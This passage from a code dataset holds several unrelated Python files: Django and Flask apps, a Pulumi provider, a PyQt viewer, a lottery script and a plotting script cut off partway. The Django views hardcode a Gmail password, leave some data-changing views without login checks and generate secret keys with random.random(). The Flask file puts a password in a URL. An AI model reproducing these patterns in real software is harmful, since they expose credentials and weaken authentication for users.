main():\n '''Run'''\n subprocess.call(f'python manage.py runserver { get_ip_address() }:{ PORT }', shell=True)\n\n\nif __name__ == '__main__':\n main()","repo_name":"andre23arruda/event-qr-code","sub_path":"runserver.py","file_name":"runserver.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19418498002","text":"import numpy as np\nfrom inspect import isroutine\n\n\nclass GenericObject():\n def __init__(self, **kwargs):\n # super(GenericObject, self).__init__()\n self.__dict__.update(**kwargs)\n\n\nclass ObjPool():\n def __init__(self, obj, objInc=1, *args, **kwargs):\n self._args = args\n self._kwargs = kwargs\n self._obj = obj\n self._objList = []\n self._objInc = objInc\n\n self._incPool()\n\n def incPool(self):\n self._objList += [self._obj(*self._args, **self._kwargs)] * self._objInc\n\n def getObj(self):\n if len(self._objList) > 0:\n return self._objList.pop()\n else:\n self._objList += [] * self.objInc\n return self._objList.pop()\n\n def releaseObj(self, obj):\n self._objList.append(obj)\n\n\n# devuelve los atributos, quitando protegidos\n# vars(o) ---> [n for n in vars(o)]\n# o.__dict__ ---> [n for n in o.__dict__]\ndef getAttribNames(o,\n showFunc='name',\n showNone=False,\n showPrivate=False,\n showRoutnines=False,\n shownMagicMethods=False):\n if showFunc == 'type':\n showf = lambda o, n: (n, type(getattr(o, n)).__name__)\n elif showFunc == 'val':\n showf = lambda o, n: (n, getattr(o, n))\n elif showFunc == 'valAndType':\n showf = lambda o, n: (n, getattr(o, n), type(getattr(o, n)).__name__)\n else:\n showf = lambda o, n: n\n\n condf = lambda o, n: not any(np.logical_or(\n [\n getattr(o, n) is None,\n n[0] == '_',\n isroutine(getattr(o, n)),\n n.startswith('__') and n.endswith('__')\n ], [\n showNone,\n showPrivate,\n showRoutnines,\n shownMagicMethods\n ]))\n\n return [showf(o, n) for n in dir(o) if condf(o, n)]\n\n\ndef isIterable(obj):\n 'Indica si es una lista o una tupla'\n return isinstance(obj, list) or isinstance(obj, tuple)\n# return isinstance(obj, (list, tuple))\n\n\n\n\n","repo_name":"NCToader/DeepSpineTool","sub_path":"app/plugins/utils/image/generic.py","file_name":"generic.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"13903244802","text":"from django.shortcuts import render, redirect\nfrom .models import InterestForm, ExperienceForm, PhoneInterview\nimport smtplib\nimport math\nimport random\nfrom email.message import EmailMessage\nfrom django.views.generic import DetailView\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\n# Create your views here.\n\n\ndef induction(request, pk):\n EMAIL_ADDRESS = 'tapapplication2020@gmail.com'\n EMAIL_PASSWORD = 'Testing321'\n acceptance_msg = EmailMessage()\n acceptance_msg['Subject'] = 'Accepted for induction'\n acceptance_msg['From'] = EMAIL_ADDRESS\n acceptance_msg['To'] = pk\n acceptance_msg.set_content(\"You are selected for the induction program.\")\n with smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp:\n smtp.login(EMAIL_ADDRESS, EMAIL_PASSWORD)\n smtp.send_message(acceptance_msg)\n messages.success(request, f'Sent induction email !')\n return redirect('phone-interview')\n\n\n@login_required\ndef phone_interview_detail(request, pk):\n if request.method == \"POST\":\n obj = PhoneInterview.objects.filter(email=pk).first()\n a = request.POST.get('1', '')\n a = int(a)\n if a >= 3:\n obj.accepted = True\n else:\n obj.accepted = False\n obj.grade = request.POST.get('1', '')\n obj.save()\n return redirect('phone-interview')\n return render(request, 'phone_interview_detail.html', context={'object': InterestForm.objects.filter(email=pk).first(), 'eobject': ExperienceForm.objects.filter(email=pk).first()})\n\n\n@login_required\ndef phone_interview(request):\n context = {\n 'interests': InterestForm.objects.all(),\n 'experiences': ExperienceForm.objects.filter(shortlisted=True),\n 'interviews': PhoneInterview.objects.all()\n\n }\n if request.method == \"POST\":\n selected_interest = request.POST.get('property', \"\")\n selected_exp = request.POST.get('exp', \"\")\n if selected_interest != 'all':\n context = {\n 'interests': InterestForm.objects.all(),\n 'experiences': ExperienceForm.objects.filter(interest__icontains=selected_interest),\n 'interviews': PhoneInterview.objects.all()\n }\n return render(request, 'phone_interview.html', context)\n context = {\n 'interests': InterestForm.objects.all(),\n 'experiences': ExperienceForm.objects.filter(shortlisted=True),\n 'interviews': PhoneInterview.objects.all()\n }\n print(context)\n return render(request, 'phone_interview.html', context)\n\n\ndef interview_timing(request, pk):\n if request.method == \"POST\":\n time = request.POST.get('time', \"\")\n name = request.POST.get('name', \"\")\n obj = PhoneInterview(name=name, timing=time, email=pk)\n obj.save()\n return render(request, 'thankyou.html')\n\n return render(request, 'interview_timing.html', {'email': pk})\n\n\n@login_required\ndef shortlist_email(request):\n EMAIL_ADDRESS = 'tapapplication2020@gmail.com'\n EMAIL_PASSWORD = 'Testing321'\n expTrue = ExperienceForm.objects.filter(shortlisted=True)\n expFalse = ExperienceForm.objects.filter(shortlisted=False)\n true_mail = []\n false_mail = []\n for exp in expTrue:\n true_mail.append(exp.email)\n for exp in expFalse:\n false_mail.append(exp.email)\n\n for email in true_mail:\n acceptance_msg = EmailMessage()\n acceptance_msg['Subject'] = 'Accepted for phone interview'\n acceptance_msg['From'] = EMAIL_ADDRESS\n acceptance_msg['To'] = email\n acceptance_msg.set_content(\"Please enter phone interview timings:http://localhost:8000/interview/\" + email)\n with smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp:\n smtp.login(EMAIL_ADDRESS, EMAIL_PASSWORD)\n smtp.send_message(acceptance_msg)\n rejection_msg = EmailMessage()\n rejection_msg['Subject'] = 'Result of Shortlisting'\n rejection_msg['From'] = EMAIL_ADDRESS\n rejection_msg['To'] = false_mail\n rejection_msg.set_content(\"ThankYou for applying.Better luck next time.\")\n with smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp:\n smtp.login(EMAIL_ADDRESS, EMAIL_PASSWORD)\n smtp.send_message(rejection_msg)\n messages.success(request, f'Email Sent!')\n return redirect('shortlist')\n\n\n@login_required\ndef shortlist(request):\n print(\"hello\")\n context = {\n 'interests': InterestForm.objects.all(),\n 'experiences': ExperienceForm.objects.filter(shortlisted=True),\n\n }\n if request.method == \"POST\":\n selected_interest = request.POST.get('property', \"\")\n selected_exp = request.POST.get('exp', \"\")\n if selected_interest != 'all':\n context = {\n 'interests': InterestForm.objects.all(),\n 'experiences': ExperienceForm.objects.filter(interest__icontains=selected_interest),\n }\n return render(request, 'shortlist.html', context)\n context = {\n 'interests': InterestForm.objects.all(),\n 'experiences': ExperienceForm.objects.filter(shortlisted=True),\n }\n print(context)\n return render(request, 'shortlist.html', context)\n\n\n@login_required\ndef dashboard(request):\n\n if request.method == \"POST\":\n selected_interest = request.POST.get('property', \"\")\n selected_exp = request.POST.get('exp', \"\")\n if selected_interest != 'all':\n context = {\n 'interests': InterestForm.objects.all(),\n 'experiences': ExperienceForm.objects.filter(interest__icontains=selected_interest),\n }\n messages.success(request, f'Filter applied: {selected_interest}!')\n return render(request, 'index.html', context)\n\n context = {\n 'interests': InterestForm.objects.all(),\n 'experiences': ExperienceForm.objects.all()\n }\n\n return render(request, 'index.html', context)\n\n\ndef detailview(request, pk):\n if request.method == \"POST\":\n obj = ExperienceForm.objects.filter(email=pk).first()\n a = request.POST.get('1', '')\n print(a)\n a = int(a)\n if a >= 3:\n obj.shortlisted = True\n else:\n obj.shortlisted = False\n obj.grade = request.POST.get('1', '')\n obj.save()\n return redirect('dashboard')\n return render(request, 'detailview.html', context={'object': InterestForm.objects.filter(email=pk).first(), 'eobject': ExperienceForm.objects.filter(email=pk).first()})\n\n\n# def grade(request):\n# if request.method == \"POST\":\n\n\ndef home(request):\n\n return render(request, 'index.html')\n\n\ndef interest(request):\n EMAIL_ADDRESS = 'tapapplication2020@gmail.com'\n EMAIL_PASSWORD = 'Testing321'\n\n if request.method == \"POST\":\n string = \"0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n lent = len(string)\n otp = \"\"\n for i in range(15):\n otp += string[math.floor(random.random() * lent)]\n\n name = request.POST.get('name', \"\")\n email = request.POST.get('email', \"\")\n phno = request.POST.get('phno', '')\n city = request.POST.get('city', \"\").lower()\n pincode = request.POST.get('pincode', '')\n\n # email_body = \"\"\"
\n        # Congratulations! We've successfully created account.\n        # Go to the page: click here\n        # Thanks,\n        # XYZ Team.\n        # 
\"\"\"\n\n # msg = MIMEText(email_body ,'html')\n\n print(otp, city)\n if city == \"mumbai\" or city == \"pune\":\n msg = EmailMessage()\n msg['Subject'] = 'Approval for Form 2 submission'\n msg['From'] = EMAIL_ADDRESS\n msg['To'] = email\n msg.set_content('Secret Key: ' + otp + \"\\nThis key is confidential do not share\\nLink for Form 2:http://localhost:8000/experience/\")\n with smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp:\n smtp.login(EMAIL_ADDRESS, EMAIL_PASSWORD)\n smtp.send_message(msg)\n inst = InterestForm(name=name, phone_number=phno, email=email, city=city, secret_key=otp, pincode=pincode)\n inst.save()\n else:\n inst = InterestForm(name=name, phone_number=phno, email=email, city=city, pincode=pincode)\n inst.save()\n\n return render(request, 'adminusers/logout.html')\n\n return render(request, 'form1.html')\n\n\n# def sk_validation(request, sk):\n# render(request,)\n\n\ndef form2_post(request):\n if request.method == \"POST\":\n interest_list = request.POST.getlist('checkbox[]', '')\n email = request.POST.get('email', \"\")\n desc = request.POST.get('desc', \"\")\n print(interest_list, email)\n interest = \"\"\n experience = \"\"\n for i in range(len(interest_list)):\n interest += interest_list[i] + \" \"\n print(interest)\n for i in range(1, 8):\n experience = experience + \" \" + request.POST.get(\"exp\" + str(i))\n experience_form = ExperienceForm(email=email, interest=interest, experience=experience, description=desc)\n print(experience_form)\n experience_form.save()\n return render(request, 'failure.html')\n\n\ndef experience(request):\n\n if request.method == 'POST':\n sk = request.POST.get('sk', \"\")\n if len(InterestForm.objects.filter(secret_key=sk)) != 0:\n return render(request, 'form2.html', {'object': InterestForm.objects.filter(secret_key=sk).first()})\n else:\n return render(request, 'failure.html')\n\n return render(request, 'sk_validation.html')\n","repo_name":"shubhamshettyy/Tap-App","sub_path":"dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72142713449","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"metaloader\",\n version=\"0.4.0\",\n author=\"Jacob Neil Taylor\",\n author_email=\"me@jacobtaylor.id.au\",\n description=\"A configurable pipeline for loading data files\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/jacobneiltaylor/metaloader\",\n package_dir={'': 'src'},\n packages=setuptools.find_packages(where='src'),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.7',\n install_requires=[\n \"ruamel.yaml\",\n \"plugable\"\n ],\n)\n","repo_name":"jacobneiltaylor/metaloader","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20275440540","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\n\nfrom PyQt5.QtWidgets import (\n QApplication, \n QLabel, \n QMainWindow)\nfrom PyQt5.QtGui import QPixmap\nfrom PyQt5.QtCore import QSize, Qt \nimport sys\n\nclass MainWindow(QMainWindow):\n def __init__(self):\n super().__init__()\n \n self.setWindowTitle(\"My App\")\n \n widget = QLabel(\"Hello\")\n widget.setPixmap(QPixmap(\"otje.jpg\"))\n widget.setScaledContents(True)\n \n self.setCentralWidget(widget)\n \n \nif(__name__ == \"__main__\"):\n app = QApplication(sys.argv)\n window = MainWindow()\n window.show()\n \n app.exec_() ","repo_name":"Jemilianomr/Escuela","sub_path":"IVA/imagen.py","file_name":"imagen.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19737819789","text":"from pathlib import Path\nfrom typing import Any, Dict, Optional\n\nfrom pulumi import ResourceOptions\nfrom pulumi.dynamic import Resource\nfrom pulumi.dynamic.dynamic import CreateResult, DiffResult, ResourceProvider\n\nEXPORTS_FILE_NAME = \"aws-exports.js\"\n\n\nclass AmplifyExportsFile(Resource):\n \"\"\"\n Manages an Amplify-style JavaScript exports file, containing parameters for use\n by client code. By default this file will be called aws-exports.js.\n \"\"\"\n\n def __init__(\n self,\n name: str,\n source_directory: str,\n parameters: Dict,\n opts: Optional[ResourceOptions] = None,\n ):\n \"\"\"\n :param str source_directory: The path of the client source directory in\n which the exports file should be placed\n :param Dict parameters: The parameters which will appear in the\n JavaScript object\n \"\"\"\n\n super().__init__(\n AmplifyExportsFileProvider(),\n name,\n {\n \"exports_file_path\": str(\n Path(source_directory).joinpath(EXPORTS_FILE_NAME)\n ),\n \"parameters\": parameters,\n },\n opts,\n )\n\n\nclass AmplifyExportsFileProvider(ResourceProvider):\n \"\"\"\n The dynamic provider for the AmplifyExportsFile resource, which creates and\n deletes the file.\n \"\"\"\n\n def create(self, inputs: Dict[str, Any]) -> CreateResult:\n file_inputs = inputs[\"parameters\"]\n\n file_content = [\n \"/* eslint-disable */\",\n (\n \"// WARNING: DO NOT EDIT. This file is automatically generated by \"\n \"pulumi-amplify. It will be overwritten.\"\n ),\n \"\",\n \"const awsmobile = {\",\n *[f' \"{key}\": \"{file_inputs[key]}\",' for key in file_inputs.keys()],\n \"};\",\n \"\",\n \"\",\n \"export default awsmobile;\",\n ]\n exports_file_path = Path(inputs[\"exports_file_path\"])\n exports_file_path.write_text(\"\\n\".join(file_content))\n return CreateResult(\n exports_file_path.name, {\"exports_file_path\": inputs[\"exports_file_path\"]}\n )\n\n def diff(self, _id, olds, _news):\n return DiffResult(\n changes=True, replaces=olds.keys(), delete_before_replace=True\n )\n\n def delete(self, _id, props):\n Path(props[\"exports_file_path\"]).unlink()\n","repo_name":"cloudspeak/pulumi-amplify","sub_path":"pulumi_amplify/amplify_exports_file.py","file_name":"amplify_exports_file.py","file_ext":"py","file_size_in_byte":2503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4498157409","text":"import os\nimport time\nimport logging\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ducatus_exchange.settings')\nimport django\n\ndjango.setup()\n\nfrom django.utils import timezone\nfrom ducatus_exchange.lottery.models import Lottery, LotteryPlayer\nfrom ducatus_exchange.settings import LOTTERY_CLOSING_INTERVAL, LOTTERY_CHECKER_INTERVAL\nfrom random_contract.executor import finalize_lottery\n\nlogger = logging.getLogger('lottery_checker')\n\nif __name__ == '__main__':\n\n while True:\n for lottery in Lottery.objects.filter(ended=False):\n if lottery.sent_duc_amount >= lottery.duc_amount and lottery.filled_at:\n if timezone.now().timestamp() - lottery.filled_at > LOTTERY_CLOSING_INTERVAL:\n winners = finalize_lottery(lottery.gave_tickets_amount)\n\n lottery.winner_numbers = winners\n winner_users = [None] * len(winners)\n\n tickets_amount = 0\n for lottery_player in LotteryPlayer.objects.order_by('id'):\n if not all(winner_users):\n prev_tickets_amount = tickets_amount\n tickets_amount += lottery_player.tickets_amount\n for i, winner_number in enumerate(winners):\n if prev_tickets_amount < winner_number <= tickets_amount:\n winner_users[i] = lottery_player.id\n else:\n break\n\n lottery.winner_players_ids = winner_users\n\n lottery.ended = True\n lottery.save()\n\n lottery.send_mails_to_winners()\n logger.info(msg=f'lottery {lottery.name} with id {lottery.id} closed')\n\n time.sleep(LOTTERY_CHECKER_INTERVAL)\n","repo_name":"MyWishPlatform/ducatus_exchange_backend","sub_path":"lottery_checker.py","file_name":"lottery_checker.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8211944509","text":"import json, os, sys\nfrom flask import Flask, flash, request, redirect, url_for\nimport requests\nfrom flask import jsonify\n\napp = Flask(__name__)\napp.config['DEBUG'] = True\n\n#Configuration_login\nUserName = \"Terafast\"\nPwd = \"!changeme!\"\n\n@app.route(\"/\")\ndef index():\n return (\"Terafast RFID Test\")\n\n#@app.route(\"/login\")\ndef login():\n try:\n token = None;\n login_url = \"http://controller:8080/auth/login?username=Admin@\"+UserName+\"&password=\"+Pwd\n headers = []\n token = requests.get(login_url, headers)\n if token.text is not None:\n token_dict= json.loads(token.text)\n if 'access-token' in token_dict:\n token = token_dict['access-token']\n except Exception as er:\n raise er \n\n return token\n\n@app.route(\"/attendance/status//\")\ndef emp_status_report(startdate=None, enddate=None):\n try:\n token = login()\n headers = {\"Authorization\" : \"Bearer %s \" %token, \"Content-Type\":\"application/json\"}\n getstatus = \"http://controller:8080/attendance/status?startDate=\"+startdate+\" 00:00:00&endDate=\"+enddate+\" 23:59:59\"\n resp = requests.get(getstatus, headers = headers)\n\n except Exception as er:\n raise er\n\n return jsonify({\"status\" : resp.text})\n\n@app.route(\"/attendance/detailed///\")\ndef emp_detailed_report(startdate, enddate, uId):\n try:\n token = login()\n headers = {\"Authorization\" : \"Bearer %s \" %token, \"Content-Type\":\"application/json\"}\n empDetails = \"http://controller:8080/attendance/detailed?startDate=%s 00:00:00&endDate=%s 23:59:59&uId=%s\"%(startdate, \n enddate, uId)\n resp = requests.get(empDetails, headers = headers)\n\n except Exception as er:\n raise er\n\n return jsonify({\"detailedReport\" :resp.text})\n\n\n@app.route(\"/attendance/summary//\")\ndef emp_summary_report(startdate, enddate):\n try:\n token = login()\n headers = {\"Authorization\" : \"Bearer %s \" %token, \"Content-Type\":\"application/json\"}\n getSummary = \"http://controller:8080/attendance/summary?startDate=\"+startdate+\" 00:00:00&endDate=\"+enddate+\" 23:59:59\"\n resp = requests.get(getSummary, headers = headers)\n\n except Exception as er:\n raise er\n\n return jsonify({\"getSummary\" : resp.text})\n\n\n\nif __name__ == \"__main__\":\n\n app.run(host='10.6.7.88', port = 9000)\n","repo_name":"kathirm/TNPLTRPA","sub_path":"attndAPi.py","file_name":"attndAPi.py","file_ext":"py","file_size_in_byte":2420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38273466585","text":"import os\nimport numpy as np\nfrom jaratoolbox import spikesanalysis\nfrom jaratoolbox import celldatabase\nfrom jaratoolbox import ephyscore\nfrom jaratoolbox import settings\nfrom jaratoolbox import extraplots\nimport figparams\nreload(figparams)\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib import gridspec\n\n# dbPath = os.path.join(settings.FIGURES_DATA_PATH, figparams.STUDY_NAME, 'celldatabase_ALLCELLS.h5')\n# dbPath = os.path.join(settings.FIGURES_DATA_PATH, figparams.STUDY_NAME, 'celldatabase_ALLCELLS_MODIFIED_CLU.h5')\ndbPath = os.path.join(settings.FIGURES_DATA_PATH, figparams.STUDY_NAME, 'celldatabase_calculated_columns.h5')\n# db = pd.read_hdf(dbPath, key='dataframe')\ndb = celldatabase.load_hdf(dbPath)\n\nFIGNAME = 'figure_noise_laser'\n# outputDir = os.path.join(settings.FIGURES_DATA_PATH, figparams.STUDY_NAME, FIGNAME)\noutputDir = '/tmp'\nfigFilename = 'plots_noise_laser' # Do not include extension\nfigFormat = 'svg' # 'pdf' or 'svg'\n\n\n\n# figSize = [13, 6] # In inches\n\nfullPanelWidthInches = 6.9\nfigSizeFactor = 2\nfigWidth = fullPanelWidthInches * (figSizeFactor)\nfigHeight = figWidth / 2.16\nfigSize = [figWidth, figHeight] # In inches\n\n\nSAVE_FIGURE=1\n\nplt.clf()\ngs = gridspec.GridSpec(2, 3)\ngs.update(top=0.95, bottom=0.08, hspace=0.5)\nplt.hold(1)\n\nlabelPosX = [0.02, 0.34, 0.66] # Horiz position for panel labels\nlabelPosY = [0.43, 0.94] # Vert position for panel labels\n\nfontSizeLabels = figparams.fontSizeLabels * figSizeFactor\nfontSizeTicks = figparams.fontSizeTicks * figSizeFactor\nfontSizePanel = figparams.fontSizePanel * figSizeFactor\n\naxThalCartoon = plt.subplot(gs[0,0])\naxThalCartoon.axis('off')\naxACCartoon = plt.subplot(gs[1,0])\naxACCartoon.axis('off')\n\ngsThalResp = gridspec.GridSpecFromSubplotSpec(2, 1, subplot_spec=gs[0, 1], hspace=0.7)\ngsThalNoise = gridspec.GridSpecFromSubplotSpec(2, 1, subplot_spec=gsThalResp[0], hspace=0)\naxThalNoiseRaster = plt.subplot(gsThalNoise[0])\naxThalNoisePSTH = plt.subplot(gsThalNoise[1])\n\ngsThalLaser = gridspec.GridSpecFromSubplotSpec(2, 1, subplot_spec=gsThalResp[1], hspace=0)\naxThalLaserRaster = plt.subplot(gsThalLaser[0])\naxThalLaserPSTH = plt.subplot(gsThalLaser[1])\n\ngsACResp = gridspec.GridSpecFromSubplotSpec(2, 1, subplot_spec=gs[1, 1], hspace=0.5)\ngsACNoise = gridspec.GridSpecFromSubplotSpec(2, 1, subplot_spec=gsACResp[0], hspace=0)\naxACNoiseRaster = plt.subplot(gsACNoise[0])\naxACNoisePSTH = plt.subplot(gsACNoise[1])\n\ngsACLaser = gridspec.GridSpecFromSubplotSpec(2, 1, subplot_spec=gsACResp[1], hspace=0)\naxACLaserRaster = plt.subplot(gsACLaser[0])\naxACLaserPSTH = plt.subplot(gsACLaser[1])\n\naxThalSites = plt.subplot(gs[0, 2])\naxThalSites.axis('off')\naxACSites = plt.subplot(gs[1, 2])\naxACSites.axis('off')\n\n\nthalExample = {'cluster': 2,\n 'date': '2017-02-15',\n 'depth': 2902.0,\n 'subject': 'pinp015',\n 'tetrode': 8}\n\n#Good noise response but only onset laser response\n# thalExample = {'cluster': 3,\n# 'date': '2017-11-16',\n# 'depth': 3046.0,\n# 'subject': 'pinp026',\n# 'tetrode': 4}\n\nacExample = {'cluster': 5,\n 'date': '2017-02-02',\n 'depth': 1275.0,\n 'subject': 'pinp015',\n 'tetrode': 1}\n\n#This example is noisey and not as good\n# acExample = {'cluster': 6,\n# 'date': '2017-03-09',\n# 'depth': 1904.0,\n# 'subject': 'pinp016',\n# 'tetrode': 6}\n\nindRowThal, rowThal = celldatabase.find_cell(db, **thalExample)\nindRowAC, rowAC = celldatabase.find_cell(db, **acExample)\n\n## -- Plot colors -- ##\ncolorNoise = figparams.colp['sound']\ncolorLaser = figparams.colp['blueLaser']\ncolorPSTH = 'k'\ncolorRaster = 'k'\nstimLineWidth = 4\npsthLineWidth = 2\nrasterMS = figparams.rasterMS\n\n## -- Raster/PSTH parameters --##\nstimLineOffsetFrac = 0.2\nalignmentRange = [-0.2, 0.6]\ndisplayRange = [-0.1, 0.3]\nbinsize = 10 #in milliseconds\nbinEdges = np.around(np.arange(alignmentRange[0]-(binsize/1000.0), alignmentRange[1]+2*(binsize/1000.0), (binsize/1000.0)), decimals=2)\nsmoothPSTH = True\nsmoothWinSize = 1\nwinShape = np.concatenate((np.zeros(smoothWinSize),np.ones(smoothWinSize))) # Square (causal)\nwinShape = winShape/np.sum(winShape)\npsthTimeBase = np.linspace(alignmentRange[0], alignmentRange[1], num=len(binEdges)-1)\n\n## -- Thalamus Noise -- ##\nspikeTimesFromEventOnset = None\ntrialIndexForEachSpike = None\nindexLimitsEachTrial = None\nsessiontype = 'noiseburst'\ncell = ephyscore.Cell(rowThal)\nephysData, bdata = cell.load(sessiontype)\nspikeTimes = ephysData['spikeTimes']\neventOnsetTimes = ephysData['events']['stimOn']\n(spikeTimesFromEventOnset,\n trialIndexForEachSpike,\n indexLimitsEachTrial) = spikesanalysis.eventlocked_spiketimes(spikeTimes,\n eventOnsetTimes,\n alignmentRange)\naxThalNoiseRaster.plot(spikeTimesFromEventOnset, trialIndexForEachSpike, 'k.',\n ms=rasterMS, rasterized=True)\naxThalNoiseRaster.set_xlim(displayRange)\naxThalNoiseRaster.axis('off')\n\nthalNoiseLineY = max(trialIndexForEachSpike) + max(trialIndexForEachSpike)*stimLineOffsetFrac\naxThalNoiseRaster.plot([0, 0.1], [thalNoiseLineY, thalNoiseLineY], lw=stimLineWidth, color=colorNoise,\n clip_on=False)\n\nspikeCountMat = spikesanalysis.spiketimes_to_spikecounts(spikeTimesFromEventOnset,\n indexLimitsEachTrial, binEdges)\nthisPSTH = np.mean(spikeCountMat,axis=0)\nif smoothPSTH:\n thisPSTH = np.convolve(thisPSTH, winShape, mode='same')\nratePSTH = thisPSTH/float(binsize/1000.0)\naxThalNoisePSTH.plot(psthTimeBase, ratePSTH, '-',\n color=colorPSTH, lw=psthLineWidth)\naxThalNoisePSTH.set_xlim(displayRange)\nextraplots.boxoff(axThalNoisePSTH)\naxThalNoisePSTH.set_ylim([0, max(ratePSTH)])\naxThalNoisePSTH.set_yticks([0, np.floor(np.max(ratePSTH))])\naxThalNoisePSTH.set_ylabel('spk/s', fontsize=fontSizeLabels)\naxThalNoisePSTH.set_xticks([0, 0.3])\nextraplots.set_ticks_fontsize(axThalNoisePSTH, fontSizeTicks)\n\n## -- Thalamus Laser -- ##\nspikeTimesFromEventOnset = None\ntrialIndexForEachSpike = None\nindexLimitsEachTrial = None\nsessiontype = 'laserpulse'\ncell = ephyscore.Cell(rowThal)\nephysData, bdata = cell.load(sessiontype)\nspikeTimes = ephysData['spikeTimes']\neventOnsetTimes = ephysData['events']['stimOn']\n(spikeTimesFromEventOnset,\n trialIndexForEachSpike,\n indexLimitsEachTrial) = spikesanalysis.eventlocked_spiketimes(spikeTimes,\n eventOnsetTimes,\n alignmentRange)\naxThalLaserRaster.plot(spikeTimesFromEventOnset, trialIndexForEachSpike, 'k.', ms=rasterMS, rasterized=True)\naxThalLaserRaster.set_xlim(displayRange)\naxThalLaserRaster.axis('off')\n\nthalLaserLineY = max(trialIndexForEachSpike) + max(trialIndexForEachSpike)*stimLineOffsetFrac\naxThalLaserRaster.plot([0, 0.1], [thalLaserLineY, thalLaserLineY], lw=stimLineWidth, color=colorLaser,\n clip_on=False)\n\nspikeCountMat = spikesanalysis.spiketimes_to_spikecounts(spikeTimesFromEventOnset,\n indexLimitsEachTrial, binEdges)\nthisPSTH = np.mean(spikeCountMat,axis=0)\nif smoothPSTH:\n thisPSTH = np.convolve(thisPSTH, winShape, mode='same')\nratePSTH = thisPSTH/float(binsize/1000.0)\naxThalLaserPSTH.plot(psthTimeBase, ratePSTH, '-',\n color=colorPSTH, lw=psthLineWidth)\naxThalLaserPSTH.set_xlim(displayRange)\nextraplots.boxoff(axThalLaserPSTH)\naxThalLaserPSTH.set_ylim([0, max(ratePSTH)])\naxThalLaserPSTH.set_yticks([0, np.floor(np.max(ratePSTH))])\naxThalLaserPSTH.set_ylabel('spk/s', fontsize=fontSizeLabels)\naxThalLaserPSTH.set_xlabel('Time (s)', fontsize=fontSizeLabels, labelpad=-8)\naxThalLaserPSTH.set_xticks([0, 0.3])\nextraplots.set_ticks_fontsize(axThalLaserPSTH, fontSizeTicks)\n\n#AC Noise\nspikeTimesFromEventOnset = None\ntrialIndexForEachSpike = None\nindexLimitsEachTrial = None\nsessiontype = 'noiseburst'\ncell = ephyscore.Cell(rowAC)\nephysData, bdata = cell.load(sessiontype)\nspikeTimes = ephysData['spikeTimes']\neventOnsetTimes = ephysData['events']['stimOn']\n(spikeTimesFromEventOnset,\n trialIndexForEachSpike,\n indexLimitsEachTrial) = spikesanalysis.eventlocked_spiketimes(spikeTimes,\n eventOnsetTimes,\n alignmentRange)\naxACNoiseRaster.plot(spikeTimesFromEventOnset, trialIndexForEachSpike, 'k.', ms=rasterMS, rasterized=True)\naxACNoiseRaster.set_xlim(displayRange)\naxACNoiseRaster.axis('off')\n\nacNoiseLineY = max(trialIndexForEachSpike) + max(trialIndexForEachSpike)*stimLineOffsetFrac\naxACNoiseRaster.plot([0, 0.1], [acNoiseLineY, acNoiseLineY], lw=stimLineWidth, color=colorNoise,\n clip_on=False)\n\nspikeCountMat = spikesanalysis.spiketimes_to_spikecounts(spikeTimesFromEventOnset,\n indexLimitsEachTrial, binEdges)\nthisPSTH = np.mean(spikeCountMat,axis=0)\nif smoothPSTH:\n thisPSTH = np.convolve(thisPSTH, winShape, mode='same')\nratePSTH = thisPSTH/float(binsize/1000.0)\naxACNoisePSTH.plot(psthTimeBase, ratePSTH, '-',\n color=colorPSTH, lw=psthLineWidth)\naxACNoisePSTH.set_xlim(displayRange)\nextraplots.boxoff(axACNoisePSTH)\naxACNoisePSTH.set_ylim([0, max(ratePSTH)])\naxACNoisePSTH.set_yticks([0, np.floor(np.max(ratePSTH))])\naxACNoisePSTH.set_ylabel('spk/s', fontsize=fontSizeLabels)\naxACNoisePSTH.set_xticks([0, 0.3])\nextraplots.set_ticks_fontsize(axACNoisePSTH, fontSizeTicks)\n\n#AC Laser\nspikeTimesFromEventOnset = None\ntrialIndexForEachSpike = None\nindexLimitsEachTrial = None\nsessiontype = 'laserpulse'\ncell = ephyscore.Cell(rowAC)\nephysData, bdata = cell.load(sessiontype)\nspikeTimes = ephysData['spikeTimes']\neventOnsetTimes = ephysData['events']['stimOn']\n(spikeTimesFromEventOnset,\n trialIndexForEachSpike,\n indexLimitsEachTrial) = spikesanalysis.eventlocked_spiketimes(spikeTimes,\n eventOnsetTimes,\n alignmentRange)\naxACLaserRaster.plot(spikeTimesFromEventOnset, trialIndexForEachSpike, 'k.', ms=rasterMS, rasterized=True)\naxACLaserRaster.set_xlim(displayRange)\naxACLaserRaster.axis('off')\n\nacLaserLineY = max(trialIndexForEachSpike) + 